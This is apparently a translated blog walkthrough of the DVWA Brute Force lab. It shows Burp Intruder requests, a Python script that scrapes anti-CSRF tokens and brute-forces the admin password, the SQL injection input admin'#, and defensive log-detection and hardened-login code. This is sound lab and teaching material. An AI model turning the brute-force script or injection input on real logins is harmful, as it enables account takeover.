Abstract: In the run-output fragment the response length for the real password differs from all the others, so the password is recovered and the brute force succeeds. Source analysis: a limit on the number of failed logins was added to prevent brute forcing, and a safer mechanism is used to defend against injection.
BurpSuite Intruder Notes
Burp Intruder is a powerful tool for automating customised attacks against web applications. It can be used to automate all kinds of tasks that may come up during your testing. Module overview:
Target: configure the details of the target server for the attack
Positions: set the payload insertion points and the attack type (attack mode)
Payloads: set the payloads and configure the wordlist
Options: this tab contains request headers, request engine, attack results, grep match, grep extract, grep payloads and redirections. You can edit these options in the main Intruder UI before launching an attack, and most of them can also be changed in the attack window while it is running.
Burp Suite modules: the Intruder module in detail
Brute Force walkthrough
Low: ordinary brute force, using attack type Sniper
Payload positions:
```http
GET /vulnerabilities/brute/?username=admin&password=§s§&Login=Login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login
Connection: close
Cookie: PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=low
Upgrade-Insecure-Requests: 1
```
Brute-force result:
Sorting the results by length shows that the password is password.
Source analysis:
```php
<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];

    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );

    // Check the database: $user is concatenated straight into the SQL
    $query  = "SELECT * FROM users WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    mysql_close();
}

?>
```
From if( isset( $_GET[ 'Login' ] ) ) we can see that the server only checks whether the Login parameter is set (PHP's isset function tests whether a variable has been set and returns a boolean, true/false); there is no anti-brute-force mechanism at all.
From $pass = md5( $pass ); we know the program MD5-hashes the submitted password, so the password field cannot be used for injection. But from $user = $_GET[ 'username' ]; and the query $query = "SELECT * FROM users WHERE user = '$user' AND password = '$pass';"; we can see that the Username field is SQL injectable.
Entering admin'# as the username gives:
Medium: ordinary brute force still recovers the password, but very slowly
Source analysis:
```php
<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM users WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed: a fixed delay on every wrong guess
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    mysql_close();
}

?>
```
sleep( 2 ); makes brute forcing very slow, but there is still no anti-brute-force mechanism;
Compared with the Low source, the mysql_real_escape_string function is applied to user input. It escapes the special characters \x00, \n, \r, \, ', " and \x1a in a string, which basically defends against SQL injection (on MySQL versions below 5.5.37 with the connection encoding set to GBK, a multibyte sequence can be constructed to get past mysql_real_escape_string's escaping of the single quote). Reference: summary of PHP character-encoding bypass vulnerabilities
High: ordinary brute force fails
Source analysis:
```php
<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM users WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed: random delay
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    mysql_close();
}

// Generate Anti-CSRF token
generateSessionToken();

?>
```
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); adds an anti-CSRF token, which makes the Burp Suite brute force fail;
Analysis of a normal login: look at the URL submitted when logging in
http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=5b8ebd4aed00f92040bf08462ebb774d
An extra parameter, user_token, is submitted compared with before; look for where user_token comes from;
View the page source of http://127.0.0.1/vulnerabilities/brute/ at the login form:
(visible text of the login page; the token is carried in the form's hidden input named user_token)
```
Vulnerability: Brute Force
Login
Welcome to the password protected area admin
```
This is where the value of user_token is found;
Inferred login flow:
First read user_token from the form; include it as the user_token parameter when the form is submitted; the server validates user_token first and only then checks whether the login succeeds.
The working approach: brute force with a Python script (BeautifulSoup + urllib.request)
The source checks if( isset( $_GET[ 'Login' ] ) ) and puts no limit on the number of failed logins, so the password can still be brute forced;
Use the BeautifulSoup library to scrape the user_token value from each response page and put it into the next GET request's user_token.
```python
from bs4 import BeautifulSoup
import urllib.request
import urllib.error

header = {
    "Host": "127.0.0.1",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Referer": "http://127.0.0.1/vulnerabilities/brute/",
    "Connection": "close",
    # cookie of the logged-in DVWA session, with the security level set to high
    "Cookie": "PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=high"
}
url = "http://127.0.0.1/vulnerabilities/brute/"


def get_user_token(url, header):
    # Fetch the page and read the anti-CSRF token out of the hidden form input
    try:
        req = urllib.request.Request(url, headers=header)
        res = urllib.request.urlopen(req)
    except urllib.error.URLError as e:
        if hasattr(e, "code"):
            print(e.code)
        if hasattr(e, "reason"):
            print(e.reason)
    except Exception as e:
        print(e)
    else:
        soup = BeautifulSoup(res.read(), "html.parser")
        user_token = soup.select('input[type="hidden"]')
        return user_token[0].get("value")


def brute_req(next_url):
    # next_url = "http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}".format(password, user_token)
    try:
        req = urllib.request.Request(next_url, headers=header)
        res = urllib.request.urlopen(req)
    except urllib.error.URLError as e:
        if hasattr(e, "code"):
            print(e.code)
        if hasattr(e, "reason"):
            print(e.reason)
    except Exception as e:
        print(e)
    else:
        # Print the status code and the response length; the hit stands out by length
        print(str(res.code) + " ", end="")
        print(len(res.read()))


if __name__ == "__main__":
    with open("password.txt", "r") as fd:
        password_list = fd.read().splitlines()   # one candidate per line
    user_token = get_user_token(url, header)
    for password in password_list:
        next_url = "http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}".format(
            password, user_token)
        print(password + ":", end="")
        brute_req(next_url=next_url)
        # the token is rotated on every request, so pick up the new one for the next attempt
        user_token = get_user_token(next_url, header)
```
Run output fragment:
```
roots:200 5031
test:200 5031
test1:200 5031
test123:200 5031
test2:200 5031
password:200 5085
aaaAAA111:200 5031
888888:200 5031
88888888:200 5031
000000:200 5031
00000000:200 5031
111111:200 5031
11111111:200 5031
aaaaaa:200 5031
aaaaaaaa:200 5031
135246:200 5031
135246789:200 5031
123456:200 5031
654321:200 5031
12345:200 5031
54321:200 5031
123456789:200 5031
1234567890:200 5031
123qwe:200 5031
```
The response length for password differs from all the others, so the password is obtained and the brute force succeeds.
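From the defender's side, the same run leaves an obvious trace in the web server's access log. The following is an added example, not code from the original post or from DVWA: it parses combined-format access-log lines, flags a client that submits more login attempts against one account than a threshold inside a sliding window, and reports the response sizes that differ from the dominant failure size, which is exactly the signal the length column above gave away. The log lines, IP addresses, timestamps, the user "alice" and the TOKEN placeholder are constructed for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "/vulnerabilities/brute/"
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Prefix of the combined log format: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    qs = parse_qs(parts.query)
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": parts.path,
        # the DVWA form submits by GET, so the username is in the query string
        "user": qs.get("username", [None])[0],
        "is_login": "Login" in qs,
        "status": int(m["status"]),
        "size": 0 if m["size"] == "-" else int(m["size"]),
    }


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """One finding per (client, username) whose login attempts exceed `threshold`
    inside any `window`. A Sniper run against one account produces near-identical
    failure responses, so sizes that differ from the dominant one are listed as
    the attempts to check first."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] == LOGIN_PATH and rec["is_login"]:
            attempts[(rec["ip"], rec["user"])].append(rec)

    findings = []
    for (ip, user), recs in attempts.items():
        recs.sort(key=lambda r: r["ts"])
        start, peak = 0, 0
        for end in range(len(recs)):          # sliding window over sorted timestamps
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak <= threshold:
            continue
        failure_size = Counter(r["size"] for r in recs).most_common(1)[0][0]
        findings.append({
            "ip": ip,
            "user": user,
            "attempts": len(recs),
            "peak_in_window": peak,
            "failure_size": failure_size,
            "outlier_sizes": [r["size"] for r in recs if r["size"] != failure_size],
        })
    return findings


# --- constructed sample log: the run output above replayed as log lines ---
_GUESSES = ["roots", "test", "test1", "test123", "test2", "password", "aaaAAA111",
            "888888", "88888888", "000000", "00000000", "111111", "11111111",
            "aaaaaa", "aaaaaaaa", "135246", "135246789", "123456", "654321",
            "12345", "54321", "123456789", "1234567890", "123qwe"]
_BASE = datetime.strptime("29/Mar/2019:10:00:00 +0800", TS_FMT)


def _line(ip, ts, target, size):
    return (f'{ip} - - [{ts.strftime(TS_FMT)}] "GET {target} HTTP/1.1" 200 {size} '
            f'"http://127.0.0.1/vulnerabilities/brute/" "Mozilla/5.0"')


SAMPLE_LOG = [
    # scripted run: one guess per second, the rotating token replaced by a placeholder
    _line("10.0.0.5", _BASE + timedelta(seconds=i),
          f"{LOGIN_PATH}?username=admin&password={pw}&Login=Login&user_token=TOKEN",
          5085 if pw == "password" else 5031)
    for i, pw in enumerate(_GUESSES)
] + [
    # ordinary traffic: a page view and two manual attempts from another client
    _line("10.0.0.9", _BASE + timedelta(seconds=30), LOGIN_PATH, 4872),
    _line("10.0.0.9", _BASE + timedelta(seconds=45),
          f"{LOGIN_PATH}?username=alice&password=x&Login=Login&user_token=TOKEN", 5031),
    _line("10.0.0.9", _BASE + timedelta(seconds=70),
          f"{LOGIN_PATH}?username=alice&password=y&Login=Login&user_token=TOKEN", 5031),
]

if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```

Because the Low, Medium and High forms submit by GET, every guessed password (and, on the one hit, the real one) is written to the access log in clear; that alone is a reason for a login form to submit by POST. Grouping by (client, username) rather than client only also catches a slow run spread over several source addresses against one account once the window is widened.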
Impossible
Source analysis:
```php
<?php

if( isset( $_POST[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

        // Calculate when the user would be allowed to login again
        $last_login = $row[ 'last_login' ];
        $last_login = strtotime( $last_login );
        $timeout    = strtotime( "{$last_login} +{$lockout_time} minutes" );
        $timenow    = strtotime( "now" );

        // Check to see if enough time has passed, if it hasn't locked the account
        // (note: the comparison is the reverse of what the comment says; later DVWA releases use $timenow < $timeout)
        if( $timenow > $timeout )
            $account_locked = true;
    }

    // Check the database (if username matches the password)
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];

        // Login successful
        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
        echo "<img src=\"{$avatar}\" />";

        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
            echo "<p>Number of login attempts: <em>{$failed_login}</em>.</p>";
        }

        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    } else {
        // Login failed
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo "<pre><br />Username and/or password incorrect.<br /><br />Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";
        echo "<p>Last login attempt was at: ${last_login}.</p>";

        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }

    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>
```
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); adds an anti-CSRF token;
A limit on the number of failed logins is enforced, which prevents brute forcing;
The safer PDO (PHP Data Objects) mechanism, with bound parameters instead of string concatenation, is used to defend against SQL injection.
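To show the three Impossible-level controls working together, and the token flow inferred earlier, here is an added example in Python on sqlite3; it is not DVWA's code and not from the original post. Assumed: an in-memory users table with the columns DVWA's queries reference (user, password, failed_login, last_login, plus a salt), a dict standing in for PHP's $_SESSION, and an injectable clock so the lockout can be exercised without waiting 15 minutes. Unlike DVWA it stores salted PBKDF2 hashes rather than md5, and its lockout check locks the account while the window has not yet elapsed (compare the direction of the comparison in the source above).

```python
import hashlib
import hmac
import secrets
import sqlite3
from datetime import datetime, timedelta

TOTAL_FAILED_LOGIN = 3     # lockout threshold, the Impossible source's $total_failed_login
LOCKOUT_MINUTES = 15       # lockout window, the Impossible source's $lockout_time
FAIL_MSG = "Username and/or password incorrect."   # same text for bad password and locked account
_DUMMY_SALT = b"\x00" * 16


def hash_password(password, salt):
    """Salted PBKDF2-SHA256 (this example's choice; DVWA itself stores unsalted md5)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


class LoginService:
    """Login handler with prepared statements, a rotating anti-CSRF token and a
    failed-login lockout (hypothetical class written for this example)."""

    def __init__(self, clock=datetime.now):
        self.clock = clock          # injectable clock so the lockout can be tested
        self.db = sqlite3.connect(":memory:")
        self.db.row_factory = sqlite3.Row
        self.db.execute(
            "CREATE TABLE users (user TEXT PRIMARY KEY, salt BLOB NOT NULL, password TEXT NOT NULL, "
            "failed_login INTEGER NOT NULL DEFAULT 0, last_login TEXT)")

    def add_user(self, user, password):
        salt = secrets.token_bytes(16)
        self.db.execute("INSERT INTO users (user, salt, password) VALUES (?, ?, ?)",
                        (user, salt, hash_password(password, salt)))

    def failed_logins(self, user):
        row = self.db.execute("SELECT failed_login FROM users WHERE user = ?", (user,)).fetchone()
        return row["failed_login"] if row else None

    # --- anti-CSRF token: the counterpart of generateSessionToken() / checkToken() ---
    def generate_session_token(self, session):
        session["session_token"] = secrets.token_hex(16)
        return session["session_token"]

    def check_token(self, session, user_token):
        expected = session.get("session_token", "")
        return bool(expected) and hmac.compare_digest(expected, user_token or "")

    def login(self, session, user, password, user_token):
        """Returns (success, message). Every call rotates the session token."""
        try:
            if not self.check_token(session, user_token):
                return False, "Invalid token"
            now = self.clock()
            # bound parameter: a username such as admin'# is only a string here
            row = self.db.execute(
                "SELECT salt, password, failed_login, last_login FROM users WHERE user = ? LIMIT 1",
                (user,)).fetchone()

            locked = False
            if row and row["failed_login"] >= TOTAL_FAILED_LOGIN and row["last_login"]:
                timeout = datetime.fromisoformat(row["last_login"]) + timedelta(minutes=LOCKOUT_MINUTES)
                locked = now < timeout          # still inside the lockout window

            if row:
                ok = hmac.compare_digest(row["password"], hash_password(password, row["salt"]))
            else:
                hash_password(password, _DUMMY_SALT)   # same cost whether or not the user exists
                ok = False
            ok = ok and not locked

            if ok:
                self.db.execute("UPDATE users SET failed_login = 0 WHERE user = ?", (user,))
                message = f"Welcome to the password protected area {user}"
            else:
                self.db.execute("UPDATE users SET failed_login = failed_login + 1 WHERE user = ?", (user,))
                message = FAIL_MSG
            # last_login is stamped on every attempt, as in the Impossible source,
            # so further guesses during the lockout keep extending it
            self.db.execute("UPDATE users SET last_login = ? WHERE user = ?", (now.isoformat(), user))
            return ok, message
        finally:
            self.generate_session_token(session)
```

The failure message is identical for a wrong password and a locked account, so the response does not reveal whether a username exists; the sleep() that DVWA adds is left out because the counter, not the delay, is what bounds the number of guesses. Note the trade-off the page's design carries over: because last_login is refreshed on every failed attempt, a client that keeps guessing keeps the legitimate user locked out as well.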
When reprinting, please cite the source URL: http://m.specialneedsforspecialkids.com/yun/43973.html